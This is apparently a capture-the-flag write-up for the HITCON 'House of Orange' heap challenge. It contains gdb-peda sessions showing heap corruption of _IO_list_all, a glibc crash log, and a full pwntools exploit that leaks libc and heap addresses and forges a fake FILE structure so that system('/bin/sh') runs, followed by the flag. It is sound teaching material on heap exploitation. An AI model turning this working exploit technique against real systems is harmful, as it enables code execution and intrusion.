x/8gx 0x5555557580d0 + 1040 0x5555557584e0:=090x00000023000001f4=090x0000000000000000 0x5555557584f0:=090x0000000000000000=090x0000000000000af1 0x555555758500:=090x00007ffff7dd1b78=090x00007ffff7dd1b78 0x555555758510:=090x0000000000000000=090x0000000000000000 gdb-peda$ c AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB Breakpoint 4, 0x000055555555511e in ?? () gdb-peda$ x/8gx 0x5555557580d0 + 1040 0x5555557584e0:=090x4141414141414141=090x4141414141414141 0x5555557584f0:=090x4242424242424242=090x4242424242424242 0x555555758500:=090x4242424242424242=090x4242424242424242 0x555555758510:=090x0000000000000000=090x0000000000000000 gdb-peda$
Breakpo= int 4, 0x000055555555511e in ?? () gdb-peda$ set *0x5555557584f0 =3D 0x6E69622F gdb-peda$ set *0x5555557584f4 =3D 0x0068732F gdb-peda$ set *0x5555557584f8 =3D 0x61 gdb-peda$ set *0x5555557584fc =3D 0x0 gdb-peda$ p &_IO_list_all $1 =3D (struct _IO_FILE_plus **) 0x7ffff7dd2520 <_IO_list_all> gdb-peda$ p/x 0x7ffff7dd2520 - 0x10 $2 =3D 0x7ffff7dd2510 gdb-peda$ x/4gx 0x7ffff7dd2510 0x7ffff7dd2510:=090x0000000000000000=090x0000000000000000 0x7ffff7dd2520 <_IO_list_all>:=090x00007ffff7dd2540=090x0000000000000= 000 gdb-peda$ set *0x555555758508 =3D 0xf7dd2510 gdb-peda$ set *0x55555575850c =3D 0x7fff gdb-peda$ set *0x555555758500 =3D 0xAAAA gdb-peda$ set *0x555555758504 =3D 0x0 gdb-peda$ x/8gx 0x5555557580d0 + 1040 0x5555557584e0:=090x4141414141414141=090x4141414141414141 0x5555557584f0:=090x0068732f6e69622f=090x0000000000000061 0x555555758500:=090x000000000000aaaa=090x00007ffff7dd2510 0x555555758510:=090x000000000000000a=090x0000000000000000 gdb-peda$
gdb-ped= a$ c Continuing. Price of Orange: 700 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange: 7 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 1 *** Error in `/home/lazenca0x0/CTF/HITCON/houseoforange/houseoforange': mal= loc(): memory corruption: 0x00007ffff7dd2520 *** =3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff7a847e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7ffff7a8f13e] /lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7ffff7a91184] /home/lazenca0x0/CTF/HITCON/houseoforange/houseoforange(+0xd6d)[0x555555554= d6d] /home/lazenca0x0/CTF/HITCON/houseoforange/houseoforange(+0x1402)[0x55555555= 5402] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ffff7a2d830] /home/lazenca0x0/CTF/HITCON/houseoforange/houseoforange(+0xb19)[0x555555554= b19] =3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D 555555554000-555555557000 r-xp 00000000 08:01 139888 /h= ome/lazenca0x0/CTF/HITCON/houseoforange/houseoforange 555555756000-555555757000 r--p 00002000 08:01 139888 /h= ome/lazenca0x0/CTF/HITCON/houseoforange/houseoforange 555555757000-555555758000 rw-p 00003000 08:01 139888 /h= ome/lazenca0x0/CTF/HITCON/houseoforange/houseoforange 555555758000-55555579b000 rw-p 00000000 00:00 0 [h= eap] 7ffff0000000-7ffff0021000 rw-p 00000000 00:00 0=20 7ffff0021000-7ffff4000000 ---p 00000000 00:00 0=20 7ffff77f7000-7ffff780d000 r-xp 00000000 08:01 660756 /l= ib/x86_64-linux-gnu/libgcc_s.so.1 7ffff780d000-7ffff7a0c000 ---p 00016000 08:01 660756 /l= ib/x86_64-linux-gnu/libgcc_s.so.1 7ffff7a0c000-7ffff7a0d000 rw-p 00015000 08:01 660756 /l= ib/x86_64-linux-gnu/libgcc_s.so.1 7ffff7a0d000-7ffff7bcd000 r-xp 00000000 08:01 655589 /l= ib/x86_64-linux-gnu/libc-2.23.so 7ffff7bcd000-7ffff7dcd000 ---p 001c0000 08:01 655589 /l= ib/x86_64-linux-gnu/libc-2.23.so 7ffff7dcd000-7ffff7dd1000 r--p 001c0000 08:01 655589 /l= ib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd1000-7ffff7dd3000 rw-p 001c4000 08:01 655589 /l= ib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0=20 7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:01 655548 /l= ib/x86_64-linux-gnu/ld-2.23.so 7ffff7fd5000-7ffff7fd8000 rw-p 00000000 00:00 0=20 7ffff7ff5000-7ffff7ff8000 rw-p 00000000 00:00 0=20 7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [v= var] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [v= dso] 7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:01 655548 /l= ib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:01 655548 /l= ib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0=20 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [s= tack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v= syscall] Program received signal SIGABRT, Aborted. Stopped reason: SIGABRT 0x00007ffff7a42428 in __GI_raise (sig=3Dsig@entry=3D0x6) at ../sysdeps/unix= /sysv/linux/raise.c:54 54=09../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ x/4gx 0x7ffff7dd2510 0x7ffff7dd2510:=090x0000000000000000=090x0000000000000000 0x7ffff7dd2520 <_IO_list_all>:=090x00007ffff7dd1b78=090x0000000000000= 000 gdb-peda$ p &main_arena.top $14 =3D (mchunkptr *) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$=20 gdb-peda$ x/gx 0x00007ffff7dd1b78 0x7ffff7dd1b78 <main_arena+88>:=090x000055555577a010 gdb-peda$
from pwn = import * p =3D process('./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682') libc =3D ELF('/lib/x86_64-linux-gnu/libc-2.23.so') def Build(len,name): p.recvuntil('Your choice : ') p.sendline('1') p.recvuntil('Length of name :') p.sendline(str(len)) p.recvuntil('Name :') p.sendline(name) p.recvuntil('Price of Orange:') p.sendline(str(100)) p.recvuntil('Color of Orange:') p.sendline(str(1)) def See(): p.recvuntil('Your choice : ') p.sendline('2') tmp =3D p.recvuntil('Price') data =3D (tmp.split('\n')[1]).ljust(8,'\x00')=09 return data def Upgrade(len,name): p.recvuntil('Your choice : ') p.sendline('3') p.recvuntil('Length of name :') p.sendline(str(len)) p.recvuntil('Name:') p.sendline(name) p.recvuntil('Price of Orange:') p.sendline(str(200)) p.recvuntil('Color of Orange:') p.sendline(str(2)) Build(128,'HEAP') #Change top size payload =3D 'A' * 144 payload +=3D p32(0xDEAD) + p32(0x20) + p64(0) payload +=3D p64(0) + p64(0xf31) Upgrade(177,payload) Build(4096,"HEAP") #Leak Libc Address Build(1024,"LEAKADD") leakLibcAddr =3D u64(See()) libcAddrBase =3D leakLibcAddr - 0x3c5188 log.info('Leak Libc Addr : ' + hex(leakLibcAddr)) log.info('Leak Liba Addr Base : ' + hex(libcAddrBase)) #Leak Heap Address Upgrade(1024,'B'*15) leakHeapAddr =3D u64(See()) leakHeapAddr -=3D 0x130 log.info('Leak Heap Addr : ' + hex(leakHeapAddr)) #Payload Info io_list_all =3D libcAddrBase + libc.symbols['_IO_list_all'] system =3D libcAddrBase + libc.symbols['system'] vtable =3D leakHeapAddr + 0x658 =20 log.info('io_list_all : ' + hex(io_list_all)) log.info('system : ' + hex(system)) log.info('vtable : ' + hex(vtable)) payload =3D "C" * 1056 #Write to "Fake struct _IO_FILE_plus", " Fake struct _IO_wide_data" stream =3D "/bin/sh\x00" + p64(0x61) stream +=3D p64(0xddaa) + p64(io_list_all-0x10) stream =3D stream.ljust(0xa0,"\x00") stream +=3D p64(leakHeapAddr+0x700-0xd0) stream =3D stream.ljust(0xc0,"\x00") stream +=3D p64(1) payload +=3D stream payload +=3D p64(0)*2 payload +=3D p64(vtable) payload +=3D p64(1) payload +=3D p64(2) payload +=3D p64(3) payload +=3D p64(0)*3 payload +=3D p64(system) Upgrade(2048,payload) p.recvuntil(":") p.sendline("1") =20 p.interactive()
Flag | hitcon{Y0ur_4r3_the_g0d_of_h34p_= 4nd_Or4ng3_is_s0_4ngry} |
---|
<= /p>